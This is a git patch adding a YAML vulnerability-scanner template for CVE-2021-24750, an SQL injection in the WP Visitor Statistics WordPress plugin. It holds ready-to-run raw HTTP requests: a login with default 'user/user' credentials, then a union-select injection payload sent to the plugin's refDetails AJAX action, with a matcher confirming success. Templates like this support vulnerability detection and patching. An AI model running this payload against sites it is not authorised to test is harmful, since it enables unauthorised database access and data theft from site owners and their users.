From dad34d012cd06617bbc5ca60ed2dd00da462eaa7 Mon Sep 17 00:00:00 2001 From: cckuailong <346813862@qq.com> Date: Sun, 23 Jan 2022 13:17:20 +0800 Subject: [PATCH] add CVE-2021-24750 --- cves/2021/CVE-2021-24750.yaml | 62 +++++++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 cves/2021/CVE-2021-24750.yaml diff --git a/cves/2021/CVE-2021-24750.yaml b/cves/2021/CVE-2021-24750.yaml new file mode 100644 index 0000000000..c0ce26d9fa --- /dev/null +++ b/cves/2021/CVE-2021-24750.yaml @@ -0,0 +1,62 @@ +id: CVE-2021-24750 + +info: + name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI + author: cckuakilong + severity: high + description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-24750 + - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py + tags: cve,cve2021,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2021-24750 + cwe-id: CWE-89 + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Host: {{Hostname}} + Accept-Language: de,en-US;q=0.7,en;q=0.3 + Content-Type: application/x-www-form-urlencoded + Origin: http://{{Hostname}} + Upgrade-Insecure-Requests: 1 + Cookie: wordpress_test_cookie=WP%20Cookie%20check + Content-Length: 47 + Connection: close + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5(1),4--%20%22%7D HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + + payloads: + username: + - user + password: + - user + attack: clusterbomb + + cookie-reuse: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "c4ca4238a0b923820dcc509a6f75849b" + + - type: status + status: + - 200 \ No newline at end of file